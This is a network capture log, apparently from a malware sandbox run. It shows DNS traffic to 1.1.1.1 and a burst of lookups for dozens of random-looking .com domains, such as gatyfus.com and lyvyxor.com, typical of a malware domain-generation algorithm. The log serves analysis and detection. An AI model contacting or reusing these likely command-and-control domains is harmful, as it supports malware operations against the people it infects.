Aug 23, 2024 18:48:57.962987900 CEST	53	57296	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.963170052 CEST	53	54234	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.966425896 CEST	53	52405	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.966814995 CEST	53	52868	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.966830969 CEST	53	53468	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.970161915 CEST	53	49746	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.974149942 CEST	53	56407	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:57.986751080 CEST	53	55106	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.018047094 CEST	53	49842	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.034877062 CEST	53	53079	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.066328049 CEST	53	62544	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.072338104 CEST	53548	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.099342108 CEST	53	53548	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.110388041 CEST	51449	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.132002115 CEST	53	65223	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.138128996 CEST	53	53868	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.138926983 CEST	52998	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.139354944 CEST	53465	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.145874977 CEST	51490	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.146394014 CEST	60733	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.147366047 CEST	65520	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.148657084 CEST	53	55122	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.161839962 CEST	53	51449	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.162859917 CEST	51323	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.168580055 CEST	53	52998	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.173589945 CEST	53	51490	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.174504042 CEST	53	60733	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.177238941 CEST	52900	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.194865942 CEST	53	51323	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.196686029 CEST	53	65520	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.206887007 CEST	53	52900	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.361932993 CEST	59450	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.368675947 CEST	61363	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.369178057 CEST	51958	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.369748116 CEST	65148	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.369957924 CEST	56140	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.370162964 CEST	61472	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.370496035 CEST	59502	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.370800018 CEST	55203	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.371210098 CEST	50470	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.371382952 CEST	62755	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.371784925 CEST	63855	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.372275114 CEST	60923	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.372477055 CEST	54552	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.376822948 CEST	53	53465	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.380325079 CEST	51400	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.380562067 CEST	61300	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.380748987 CEST	64017	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.383908033 CEST	58981	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.384160995 CEST	49193	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.384596109 CEST	55435	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.384754896 CEST	51757	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.385205984 CEST	50019	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.392108917 CEST	58420	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.392283916 CEST	52431	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.395801067 CEST	62431	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.396183968 CEST	58261	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.396503925 CEST	60611	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.396709919 CEST	49814	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.396785021 CEST	53525	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.396939039 CEST	61817	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.397111893 CEST	57472	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.397212029 CEST	60130	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.397265911 CEST	51013	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.397413969 CEST	58809	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.397499084 CEST	51059	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.397638083 CEST	61952	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.397809029 CEST	52009	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.398241997 CEST	61779	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.398794889 CEST	52339	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.400311947 CEST	59999	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.402174950 CEST	51208	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.404745102 CEST	51221	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.406524897 CEST	57354	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.409149885 CEST	53	65148	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.410144091 CEST	53	61472	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.410155058 CEST	53	56140	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.413777113 CEST	53	50470	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.416546106 CEST	53	59450	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.416557074 CEST	53	62755	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.419575930 CEST	53	54552	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.426805019 CEST	53	64017	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.430423021 CEST	53	51757	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.430435896 CEST	53	63855	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.436914921 CEST	53	51958	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.436924934 CEST	53	59502	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.437220097 CEST	53	52431	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.440869093 CEST	53	55203	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.440880060 CEST	53	58420	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.440893888 CEST	53	61363	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.440902948 CEST	53	60923	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.444044113 CEST	53	49814	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.444055080 CEST	53	61817	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.444063902 CEST	53	58261	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.449031115 CEST	53	60611	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.449042082 CEST	53	57472	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.449052095 CEST	53	51400	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.449060917 CEST	53	61300	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.449069977 CEST	53	51013	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.449081898 CEST	53	49193	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.452056885 CEST	53	55435	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.452066898 CEST	53	50019	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.452075958 CEST	53	51221	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.452085972 CEST	53	61952	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.456124067 CEST	53	58981	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.456187963 CEST	49469	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.464576006 CEST	62362	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.464660883 CEST	53	60130	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.470576048 CEST	53	51059	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.530714989 CEST	53	53525	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.536432028 CEST	53	49469	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.544258118 CEST	53	61625	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.545851946 CEST	49486	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.557746887 CEST	52363	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.595495939 CEST	53	58809	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.618653059 CEST	53	62431	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.631315947 CEST	53	52009	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.634027958 CEST	63362	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:58.641598940 CEST	53	57354	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.691643953 CEST	53	51208	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.756923914 CEST	53	49486	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.770108938 CEST	53	61779	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.802073002 CEST	53	52339	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:58.883096933 CEST	53	63362	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:59.113429070 CEST	53	62362	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:59.324592113 CEST	56301	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:48:59.339766979 CEST	53	52363	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:59.369992018 CEST	53	56301	1.1.1.1	192.168.2.4
Aug 23, 2024 18:48:59.388036966 CEST	59999	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:00.602802038 CEST	53	59999	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:00.605423927 CEST	53	59999	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.292578936 CEST	59711	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.293339014 CEST	56661	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.293385029 CEST	61553	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.293971062 CEST	56036	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.293971062 CEST	60281	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.294676065 CEST	50569	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.295011044 CEST	64215	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.295671940 CEST	65121	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.296260118 CEST	61110	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.296848059 CEST	64780	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.297442913 CEST	61874	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.298099995 CEST	60693	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.298651934 CEST	52458	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.299210072 CEST	49856	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.299808025 CEST	60049	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.300384998 CEST	62871	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.300954103 CEST	51726	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.301500082 CEST	58315	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.302083015 CEST	62241	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.302737951 CEST	57159	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.303232908 CEST	61705	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.303584099 CEST	63313	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.303690910 CEST	52711	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.304171085 CEST	58454	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.304389000 CEST	51395	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.304903984 CEST	54440	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.305392027 CEST	55467	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.305891991 CEST	61004	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.306343079 CEST	64887	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.306777954 CEST	59747	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.307290077 CEST	62896	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.307761908 CEST	53734	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.308258057 CEST	65271	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.308737040 CEST	62002	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.309158087 CEST	60941	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.309710979 CEST	61284	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.310223103 CEST	52386	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.310722113 CEST	57133	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.311157942 CEST	56229	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.311661959 CEST	63331	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.312134027 CEST	60934	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.312629938 CEST	53049	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.313049078 CEST	60112	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.313491106 CEST	62733	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.313987970 CEST	53616	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.314469099 CEST	61439	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.314973116 CEST	53	56661	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.315025091 CEST	53652	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.315846920 CEST	56481	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.315887928 CEST	53618	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.316608906 CEST	50988	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.316838980 CEST	58704	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.316840887 CEST	53	61553	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.316864967 CEST	53	60281	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.317074060 CEST	57910	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.317723036 CEST	62243	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.317944050 CEST	53	50569	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.317955017 CEST	53	64215	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.318325043 CEST	60917	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.319879055 CEST	55702	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.320058107 CEST	52788	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.320266962 CEST	65503	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.320403099 CEST	52663	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.320579052 CEST	54649	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.320715904 CEST	49527	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.320858955 CEST	62169	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.321003914 CEST	63904	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.321187973 CEST	50060	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.321337938 CEST	50153	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.327116966 CEST	53	49856	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.327192068 CEST	53	54440	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.327202082 CEST	53	64780	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.327322006 CEST	53	61705	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.327332020 CEST	53	55467	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.329741001 CEST	53	64887	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.329751015 CEST	53	61004	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.329758883 CEST	53	53734	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.329767942 CEST	53	62002	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.330019951 CEST	53	60941	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.331509113 CEST	53	52386	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.331518888 CEST	53	60112	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.331526995 CEST	53	63331	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.332973003 CEST	53	56036	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.332988977 CEST	53	62733	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.334167957 CEST	53	60917	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.334178925 CEST	53	56481	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.334757090 CEST	53	57910	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.334768057 CEST	53	50988	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.335485935 CEST	53	58704	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.335498095 CEST	53	62243	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.335746050 CEST	53	54649	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.335937977 CEST	53	52788	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.336170912 CEST	53	52663	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.336287975 CEST	53	62169	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.337342978 CEST	53	63904	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.344126940 CEST	53	65271	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.346472025 CEST	53	62241	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.346601009 CEST	53	62896	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.346914053 CEST	53	61874	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.347012997 CEST	53	58454	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.347023010 CEST	53	51395	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.347158909 CEST	53	60049	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.347167969 CEST	53	58315	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.347176075 CEST	53	62871	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.347487926 CEST	53	59747	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.355380058 CEST	53	60934	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.355482101 CEST	53	52711	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.355493069 CEST	53	60693	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358375072 CEST	53	57159	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358383894 CEST	53	53049	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358392954 CEST	53	56229	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358401060 CEST	53	61439	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358409882 CEST	53	53616	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358418941 CEST	53	53652	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358428001 CEST	53	65503	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358515978 CEST	53	50060	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358525038 CEST	53	50153	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.358531952 CEST	53	53618	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.360537052 CEST	53	55702	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.362685919 CEST	53037	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.363696098 CEST	53	49527	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.375580072 CEST	53	53037	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.464183092 CEST	53	61284	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.473449945 CEST	53	63313	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.473612070 CEST	53	51726	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.476619959 CEST	53	65121	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.478456020 CEST	53	61110	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.482508898 CEST	53087	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.482800007 CEST	53	57133	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.485553026 CEST	53	59711	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.499622107 CEST	61305	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:04.520848989 CEST	53	61305	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.585969925 CEST	53	53087	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.714740038 CEST	53	52458	1.1.1.1	192.168.2.4
Aug 23, 2024 18:49:04.904136896 CEST	60315	53	192.168.2.4	1.1.1.1
Aug 23, 2024 18:49:05.473535061 CEST	53	60315	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 23, 2024 18:46:59.878585100 CEST	192.168.2.4	1.1.1.1	0x2a8	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.194921970 CEST	192.168.2.4	1.1.1.1	0x8a6	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.233679056 CEST	192.168.2.4	1.1.1.1	0x6eb6	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.245896101 CEST	192.168.2.4	1.1.1.1	0x8281	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.246351004 CEST	192.168.2.4	1.1.1.1	0x226f	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.247881889 CEST	192.168.2.4	1.1.1.1	0x45da	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.400531054 CEST	192.168.2.4	1.1.1.1	0x136a	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.401423931 CEST	192.168.2.4	1.1.1.1	0x657c	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.425571918 CEST	192.168.2.4	1.1.1.1	0x4114	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.452471972 CEST	192.168.2.4	1.1.1.1	0x3911	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.569793940 CEST	192.168.2.4	1.1.1.1	0xa038	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.569981098 CEST	192.168.2.4	1.1.1.1	0x57b2	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.570346117 CEST	192.168.2.4	1.1.1.1	0xf577	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.570496082 CEST	192.168.2.4	1.1.1.1	0x1bf2	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.570624113 CEST	192.168.2.4	1.1.1.1	0xac6	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.570748091 CEST	192.168.2.4	1.1.1.1	0x7e89	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.570887089 CEST	192.168.2.4	1.1.1.1	0x797	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.571018934 CEST	192.168.2.4	1.1.1.1	0x9b7c	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.571315050 CEST	192.168.2.4	1.1.1.1	0x6671	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.571496964 CEST	192.168.2.4	1.1.1.1	0x1fee	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.571657896 CEST	192.168.2.4	1.1.1.1	0xefc6	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.571813107 CEST	192.168.2.4	1.1.1.1	0xb36e	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.572108984 CEST	192.168.2.4	1.1.1.1	0x6be9	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.572258949 CEST	192.168.2.4	1.1.1.1	0xb8a7	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.572395086 CEST	192.168.2.4	1.1.1.1	0x234d	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.572529078 CEST	192.168.2.4	1.1.1.1	0x232a	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.572696924 CEST	192.168.2.4	1.1.1.1	0x4810	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.572839022 CEST	192.168.2.4	1.1.1.1	0xc262	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.572989941 CEST	192.168.2.4	1.1.1.1	0x5c9a	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.573390007 CEST	192.168.2.4	1.1.1.1	0x90de	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.573564053 CEST	192.168.2.4	1.1.1.1	0x40df	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.573795080 CEST	192.168.2.4	1.1.1.1	0x8c58	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.573945045 CEST	192.168.2.4	1.1.1.1	0x7af4	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.574074030 CEST	192.168.2.4	1.1.1.1	0xa0f6	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.576349974 CEST	192.168.2.4	1.1.1.1	0x1584	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.576349974 CEST	192.168.2.4	1.1.1.1	0x1357	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
